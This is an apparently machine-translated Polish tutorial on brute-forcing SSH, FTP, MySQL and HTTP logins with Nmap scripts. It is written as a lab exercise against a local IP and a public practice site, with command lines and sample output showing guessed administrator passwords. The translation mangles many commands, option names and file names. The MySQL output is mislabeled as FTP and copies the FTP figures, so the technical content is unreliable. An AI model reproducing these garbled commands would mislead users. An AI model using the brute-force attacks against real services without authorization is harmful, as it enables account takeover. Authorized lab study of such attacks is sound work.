Ubuntu@ubuntu: ~ $ sudo apt aktualizacja && sudo apt aktualizację
Ubuntu@ubuntu: ~ $ sudo apt instontuj nmap -y
Ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
Ubuntu@ubuntu: ~ $ ls *brute *
W tym samouczku zbadamy, w jaki sposób możemy użyć NMAP do ataku brutalnej siły.
SSH Brute Force
SSH to bezpieczny protokół zdalny i obsługuje uwierzytelnianie OpenSSL i hasło. Aby uwierzytelnianie oparte na hasłach Brute Force SSH, możemy użyć „SSH-Brute.NSE ”skrypt nmap.
ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*brute*
SSH-Brute.nse
Przekaż nazwę użytkownika i listy haseł jako argument NMAP.
Ubuntu@ubuntu: ~ $ nmap - -Script SSH -Brute -p22 192.168.43.181
--Script-Args UserDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 17:09 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00033s).
Usługa państwa portowego
22/TCP Open SSH
|. SSH-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: Wykonano 99 domysłu w 60 sekund, średni TPS: 1.7
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 60.17 sekund
FTP Brute Force
FTP to protokół transferu plików, który obsługuje uwierzytelnianie oparte na hasłach. Aby Brute Force FTP, użyjemy „FTP-Brute.NSE ”skrypt nmap.
ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brute*
FTP-Brute.nse
Przekaż nazwę użytkownika i listy haseł jako argument NMAP.
Ubuntu@ubuntu: ~ $ nmap - -Script ftp -Brute -p21 192.168.43.181-argumenty Script
userDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 16:51 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00021s).
Usługa państwa portowego
21/TCP Otwórz FTP
|. FTP-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: wykonano 99 domysły w 20 sekund, średni TPS: 5.0
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 19.50 sekund
Mysql Brute Force
Czasami MySQL jest otwarty na połączenia zewnętrzne i pozwala każdemu z nim połączyć. Jego hasło można pękać za pomocą NMAP za pomocą skryptu „MySQL-Brute”.
Ubuntu@ubuntu: ~ $ sudo nmap -Script MySQl -Brute -p3306 192.168.43.181
--Script-Args UserDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 16:51 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00021s).
Usługa państwa portowego
3306/TCP Otwórz mysql
|. FTP-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: wykonano 99 domysły w 20 sekund, średni TPS: 5.0
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 19.40 sekund
HTTP Brute Force
HTTP używa trzech rodzajów uwierzytelniania do uwierzytelniania użytkowników na serwery internetowe. Metodologie te są używane w routerach, modemach i zaawansowanych aplikacjach internetowych do wymiany nazw użytkowników i haseł. Te typy to:
Podstawowe uwierzytelnianie
W protokole uwierzytelniania HTTP przeglądarka koduje nazwę użytkownika i hasło z Base64 i wysyła ją pod nagłówkiem „autoryzacja”. Możesz to zobaczyć na poniższym zrzucie ekranu.
Autoryzacja: podstawowy ywrtaw46ywrtaw4 =
Możesz basować64 dekodować ten ciąg, aby zobaczyć nazwę użytkownika i hasło
Ubuntu@ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | base64 -d
Admin: admin
Podstawowe uwierzytelnianie HTTP jest niepewne, ponieważ wysyła zarówno nazwę użytkownika, jak i hasło w zwykłym tekście. Każdy atakujący man-in-the-middle może łatwo przechwycić ruch i dekodować ciąg, aby uzyskać hasło.
Uwierzytelnianie trawienia
Uwierzytelnianie HTTP Digest wykorzystuje techniki mieszania do szyfrowania nazwy użytkownika i hasła przed wysłaniem go na serwer.
HASH1 = MD5 (Nazwa użytkownika: Realm: hasło)
HASH2 = MD5 (Metoda: Digesturi)
Odpowiedź = MD5 (HASH1: Nonce: NonCecount: CNONCE: QOP: HASH2)
Możesz zobaczyć te wartości pod nagłówkiem „autoryzacja”.
Uwierzytelnianie oparte na trawieniu jest bezpieczne, ponieważ hasło nie jest wysyłane zwykłym tekstem. Jeśli atakujący man-wściekli przechwytuje ruch, nie będzie w stanie uzyskać hasła zwykłego tekstu.
Uwierzytelnianie oparte na formularzu
Uwierzytelnianie podstawowe i trawienia tylko obsługują przesyłanie nazwy użytkownika i hasła, podczas gdy uwierzytelnianie oparte na formularzach można dostosować w oparciu o potrzeby użytkownika. Możesz zbudować własną stronę internetową w HTML lub JavaScript, aby zastosować własne techniki kodowania i transferu.
Zwykle dane w formularzu uwierzytelnianie są wysyłane zwykłym tekstem. W przypadku problemów z bezpieczeństwem należy zastosować HTTPS, aby zapobiec atakom man-w średnim.
Możemy brutalnie wymusić wszystkie rodzaje uwierzytelniania HTTP za pomocą NMAP. W tym celu użyjemy skryptu „http-brute”.
Ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*brute*
http-brute.nse
Aby przetestować ten skrypt NMAP, rozwiążemy publicznie hostowane wyzwanie Brute Force przez Pentester Academy na tym adresie URL http: // pentesteracademylab.Appspot.com/lab/webapp/basicauth.
Musimy podać wszystko, w tym nazwę hosta, URI, metody żądania i słowniki osobno jako argument skryptu.
Ubuntu@ubuntu: ~ $ sudo nmap -p80 -Script Http -Brute PentestesteracademyLab.Appspot.com
--argaty skryptowe http-brute.Nazwa hosta = PentesteracademyLab.Appspot.com,
http-brute.ścieżka =/lab/webapp/basicauth, userdb = użytkownicy.txt, passdb = hasła.tekst,
http-brute.metoda = post
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 21:37 PKT
Raport skanowania NMAP dla Pentestestesteracademylab.Appspot.com (216.58.210.84)
Gospodarz jest w górę (0.Opóźnienie 20s).
Inne adresy dla Pentestesteracademylab.Appspot.com (nie zeskanowany): 2A00: 1450: 4018: 803 :: 2014
rekord RDNS dla 216.58.210.84: MCT01S06-in-F84.1E100.internet
Usługa państwa portowego
80/TCP Otwórz HTTP
|. HTTP-Brute:
|. Konta:
|. Administrator: AADDD - Ważne poświadczenia
| _ Statystyka: wykonano 165 domysłu w 29 sekundach, średni TPS: 5.3
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 31.22 sekundy
Wniosek
NMAP może być używany do robienia wielu rzeczy, pomimo zwykłego skanowania portów. Może zastąpić Metasploit, Hydra, Medusa i wiele innych narzędzi wykonanych specjalnie do Brute Brute Brute. NMAP ma proste, łatwe w użyciu wbudowane scenariusze, które brutalne formy prawie każdej usługi, w tym HTTP, Telnel, SSH, MySQL, Samba i inne.